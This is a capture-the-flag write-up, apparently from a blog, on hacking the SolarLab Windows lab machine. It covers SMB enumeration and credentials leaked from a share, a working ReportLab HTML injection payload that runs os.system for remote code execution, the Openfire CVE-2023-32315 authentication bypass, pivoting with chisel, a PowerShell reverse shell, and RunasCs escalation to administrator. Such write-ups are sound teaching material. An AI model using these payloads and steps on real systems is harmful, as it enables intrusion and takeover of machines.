Image Not Showing Possible Reasons

• The image was uploaded to a note which you don't have access to
• The note which the image was originally uploaded to has been deleted

Learn More →

Hello hackers today i wanted to share with a simple writeup of one of seasonal 5 machines.Actually season 5 is very sweet so far because this time am getting better in windows machines especially AD and some most diffucts linux machines.

Description:

SolarLab is a medium easy from season 5 (windows machine) by LazyTitan23, which were required to hack it and get access to the administrator.What i love from this box is that it has one of the exploit I did from one of the machine we hacked during season 4 (savage land) if not mistaken the box was JAB.

Let the hack begin.

SCANNING

I started by scanning the whole network with nmap.

ENUMERATION

After nmap with all port done because i didn't want to make sure that am skipping anything i waited the all port scanning is done here.

Then i decided to do some enumeration one port after another.

ENUMERATING PORT 80

PORT     STATE SERVICE       REASON  VERSION
80/tcp   open  http          syn-ack nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

With port 80 we can see that we got a subdomain but also a http-server-header, what was so important for me was a domain. So i Decided to add it to the hosts file and browser to the domain name.

I didn't get much info, so i decide to brute force directories and subdomains at the same time and see what i will get.

Bad enought i ended up with a subdomain report.solarlab.htb,I didn't get any directory that was usufully.

ENUMERATING SMB

Since I saw a smb port running i decide to enumerate it also hoping i will get something cool info.

┌──(alienx㉿alienX)-[~/Desktop/MACHINES/SOLARLAB]
└─$ smbclient -L 10.10.11.16 
Password for [WORKGROUP\alienx]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Documents       Disk      
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

From we can see that other share needs password access but the only one we can login/access with anonymous was 'Documents' share.

I decided to download some of the few decuments and see if is usufully for me.

From the documents that gave me some juice info was the 'details-file.xlsx' file.

Password for [WORKGROUP\alienx]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri May 17 05:02:39 2024
  ..                                 DR        0  Fri May 17 05:02:39 2024
  concepts                            D        0  Fri Apr 26 10:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 05:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 07:27:21 2023
  LPUJYTWMSH                          D        0  Fri May 17 05:02:39 2024
  My Music                        DHSrn        0  Thu Nov 16 14:36:51 2023
  My Pictures                     DHSrn        0  Thu Nov 16 14:36:51 2023
  My Videos                       DHSrn        0  Thu Nov 16 14:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 05:35:57 2023

                7779839 blocks of size 4096. 1844829 blocks available
smb: \> mget details-file.xlsx
Get file details-file.xlsx? yes
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.0 KiloBytes/sec) (average 21.0 KiloBytes/sec)
smb: \> exit

from the excel we can see we got some of the info such as username,password and emails(lets record them somewhere and continue with our enumeration). I decided to forcus with the username and password first here.

## from Documents
users & their pass
1. blake.byte (ThisCanB3typedeasily1@)
2. AlexanderK (danenacia9234n)
3. ClaudiaS (dadsfawe9dafkn)

I wasn't done with smb LOL,So i went again and try with crackmapexec, crackmapexec is nice tool for enumeration, instead of using smbclient we can also use crackmapexec to do all those stuffs.

I decided to check for users but go nothing and decided to check for RIDs

crackmapexec smb 10.10.11.16 -u 'user' -p 'PASS' --rid-brute
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\user:PASS 
SMB         10.10.11.16     445    SOLARLAB         [+] Brute forcing RIDs
SMB         10.10.11.16     445    SOLARLAB         500: SOLARLAB\Administrator (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         501: SOLARLAB\Guest (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         513: SOLARLAB\None (SidTypeGroup)
SMB         10.10.11.16     445    SOLARLAB         1000: SOLARLAB\blake (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         1001: SOLARLAB\openfire (SidTypeUser)

N/B: After analyzing my data i decided to connect some dots, initially from smbclient i got a excel file with some username and one of them was user 'blake' also here now after using crackmapexec I get the same user, so this means we need to find somewhere where we can login with this user. Now my next guess here was that from the crackmapexec i can see a user 'openfire', what i know is that once you see user openfire probably you should know that there is either a service under port 9090 or 9091 internal on the server or inside the machine you have to do some pivoting and access this service which is also vulnerable.

And this user openfire gives me a clue that once i get access inside the machine my next step will be doing some pivoting(that was my general overview once i saw this user), Now lets see how this goes.

ENUMERATING PORT 6791

6791/tcp open  http          syn-ack nginx 1.24.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

from here we find a subdomain and a port number, I added this one into my hosts file and decided to give it a try.

url: http://report.solarlab.htb:6791/

Now we have a reportHub interface, but we need valid credentials to login here.

I tried the creds from the excel but they didn't work but, And i decide to try harder to make a small twist on the username instead of "blake" to "blakeb"

Creds

1. blake.byte (ThisCanB3typedeasily1@)  


username: blakeb
password:ThisCanB3typedeasily1@

Now we can login

ReportHub is used to generate a pdf file by either uploadind a image or even a html file.

A little google such about reportHub vulnerability i found this one from github.cve.

After some analysis about each endpoint with burp i found that we have two endpoint which can give us the same goal which was RCE.

With 'leaverequest' there is a file upload vulnlability, I will go with a simple method here, Actually the endpoint that was easy exploitable was 'travelRequest'.

After checking the burp-suite history i decided to forward this request to repeater

Now from the CVE above at the bottom there is a PoC, i decide to edit it and use it

The PoC say we can create a malicious file.html and add our malicious html code inside that will try to exploit the python libary. So instead of creating a payload am going to just put my powershell payload there, no time to upload.

payload:

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('payload here') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
    exploit
</font></para>

EXPLOITATION

EXPLOITING reportHub

I went and glab the base64 encoded powershell script and added to the payload .

Finally my payload looked like this after beutifying it like a noob LOL. There is a simple technique you need to use while encoding unless otherwise you wont get a shell("Thanks to @blackninja23 took his time those days to teach me this and and he made sure i understand this method of encoding powershell script because i was struggling with this for a long time"), just do a simple google.

Now lets get a shell.

On the blake home directory you can glab your user flag.

LATERAL MOVEMENT

With lateral movement i started checking for interesting users and localgroup, But nothing was usufull here apart from openfire user.

Now here the only user who was interesting was "openfire", What we were supposed to do here was first get a shell as user "openfire" by doing some pivoting technique and then find a way to get to administrator.

Now here i didn't even want to google because i know openfire service is running internal under port "9090 and 9091", i decided to confim this by using the command below.

PS C:\users\blake\desktop> netstat -ano | findstr "9090"
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       2244
PS C:\users\blake\desktop> netstat -ano | findstr "9090"
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       2244
PS C:\users\blake\desktop> netstat -ano | findstr "9091"
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       2244
PS C:\users\blake\desktop> 

I knew directly that In order to access this ports "9090 and 9091" I need to do some portforwading and there is where pivoting is comming into hands.We can't access this port because is running in an internal network so the only path for me to access was this computer I had access on("blake computer").

PIVOTING

uploading chisel

Am going to use chisel on both local machine and on the target machine.

I decided to get multiple shells because once one crush, i will use the others.

I will do forwarding on my localmachine on both port 9090 and 9091.

Lets decode to access these ports and see if is there really running openfire service.

url:http://127.0.0.1:9090/login.jsp?url=%2Findex.jsp

Exploiting openfire

So far we have openfire service at our local machine, but good enough is that the openfire version is vulnerable to Authentication Bypass which leds to remote code execution by uploading a vulnerable plugin and we get RCE simple as that, all this I learned from seosanal 4, from JAB machine.

Openfire, Version: 4.7.4

Google-fu and found this CVE-2023-32315 and i decided to clone it.

Now i decided to run the exploit in order to create a valid administrator username and password.

use the credential being generate to login in to the openfire.

N/B: something to note down is that the python CVE or script generates a random username and password but also if you can understand what the python script does inside it, you can try to modify it and make it generate the username and password of your choise.

Getting a shell as openfire.

First of all we need to upload a vulnerable plugin which will give us a password which we will use to acces the console. You may find it diffucult but it is very easy if you had done the JAB machine.

upload a vulnerable plugin

Then i decided to upload the plugin, its a java plugin because openfire is using java programming language.

After uploading now i was good to go.

The plugin show you the location(Management Tool) where you can find it but also it give you the pass i.e ("123").

Easiest way to find a plugin location is clicking server –-> server_setting–> Management tools

Now lets find a console, click find home page and then system command.

Now from here i was able to executing command as openfire.

getting a reverse shell

Lets get a shell because the environment is limited to us, As usually i beautified my powershell paylod and at the same time i initiated the listerner on my local machine.

payload:

powershell -e YourPayloadHere

How sweet this machine it was , It was really fun and interesting.

PRIVILEGE ESCALATION

Also privilege escalation was interesting, I don't know whether I did in an intendend way or what i will have to find "LazyTitan23" himself and ask him after the machine expires.

privilege escalation and runas script

I didn't find much info about user openfire after reaching here.

But while i was in the "program files" looking for any juice program file to exploit I got an idea of trying runasCs script. And decided to give it a try.

My idea was like this,since because i have blake password,which means i can user this password with the runasCs scipt to try to execute command and see which user will the system respond with.

i.e

As you can see i have successful executed commands as administrator, now lets a shell as administrator.

uploading nc binary

And then listern on port 1234 on my local machine

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 385E-AC57

 Directory of c:\Users\Administrator\Desktop

05/03/2024  02:32 PM    <DIR>          .
05/03/2024  02:32 PM    <DIR>          ..
05/17/2024  10:38 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,737,708,544 bytes free

c:\Users\Administrator\Desktop>